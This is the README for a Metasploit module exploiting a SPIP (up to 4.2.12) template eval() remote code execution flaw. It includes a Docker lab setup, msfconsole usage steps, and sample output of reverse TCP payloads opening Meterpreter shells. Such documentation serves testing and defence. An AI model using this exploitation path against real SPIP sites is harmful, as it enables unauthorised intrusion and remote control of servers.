README.md
Rendering markdown...
## Vulnerable Application
This Metasploit module exploits a Remote Code Execution vulnerability in SPIP versions up to and including 4.2.12.
The vulnerability occurs in SPIP’s templating system where it incorrectly handles user-supplied input, allowing an attacker
to inject and execute arbitrary PHP code.
This can be achieved by crafting a payload that manipulates the templating data processed by the `echappe_retour()` function,
which invokes `traitements_previsu_php_modeles_eval()`, containing an `eval()` call.
To replicate a vulnerable environment for testing:
1. Install SPIP using the provided Docker Compose configuration.
2. Use the image `ipeos/spip:4.2.12` to ensure the environment is vulnerable.
3. Verify that the SPIP instance is accessible on the local network.
### Docker Setup
Use the following Docker Compose file to set up the environment:
```yaml
version: '3.8'
services:
db:
image: mariadb:10.5
restart: always
environment:
- MYSQL_ROOT_PASSWORD=MysqlRootPassword
- MYSQL_DATABASE=spip
- MYSQL_USER=spip
- MYSQL_PASSWORD=spip
networks:
- spip-network
app:
image: ipeos/spip:4.2.12
restart: always
depends_on:
- db
environment:
- SPIP_AUTO_INSTALL=1
- SPIP_DB_SERVER=db
- SPIP_DB_LOGIN=spip
- SPIP_DB_PASS=spip
- SPIP_DB_NAME=spip
- SPIP_SITE_ADDRESS=http://localhost:8880
ports:
- 8880:80
networks:
- spip-network
networks:
spip-network:
driver: bridge
```
## Verification Steps
1. Set up a SPIP instance with the specified Docker environment.
2. Launch `msfconsole` in your Metasploit framework.
3. Use the module: `use exploit/multi/http/spip_porte_plume_previsu_rce`.
4. Set `RHOSTS` to the local IP address or hostname of the target.
5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
6. Execute the exploit using the `run` or `exploit` command.
7. If the target is vulnerable, the module will execute the specified payload.
## Options
No additional options are required for basic exploitation.
## Scenarios
### Successful Exploitation Against Local SPIP 4.2.12
**Setup**:
- Local SPIP instance with version 4.2.12.
- Metasploit Framework.
**Steps**:
1. Start `msfconsole`.
2. Load the module:
```
use exploit/multi/http/spip_porte_plume_previsu_rce
```
3. Set `RHOSTS` to the local IP (e.g., 127.0.0.1).
4. Configure other necessary options (TARGETURI, SSL, etc.).
5. Launch the exploit:
```
exploit
```
**Expected Results**:
With `php/meterpreter/reverse_tcp`:
```
msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8880 AutoCheck=false
[*] Started reverse TCP handler on 192.168.1.36:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Sending exploit payload to the target...
[*] Sending stage (39927 bytes) to 172.23.0.3
[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.23.0.3:35902) at 2024-08-10 21:56:50 +0200
meterpreter > sysinfo
Computer : 5d309f4bdfbe
OS : Linux 5d309f4bdfbe 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
Meterpreter : php/linux
meterpreter >
```
With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
```
msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8880 AutoCheck=false
[*] Started reverse TCP handler on 192.168.1.36:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Preparing to send exploit payload to the target...
[*] Sending exploit payload to the target...
[*] Sending stage (3045380 bytes) to 172.23.0.3
[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 172.23.0.3:38992) at 2024-08-10 22:10:19 +0200
meterpreter > sysinfo
Computer : 172.23.0.3
OS : Debian 11.9 (Linux 5.15.0-113-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
- The module successfully exploits the vulnerability and opens a Meterpreter session on the target.
**Note**: Ensure the SPIP instance is correctly configured and running in the Docker environment for the exploit to work as expected.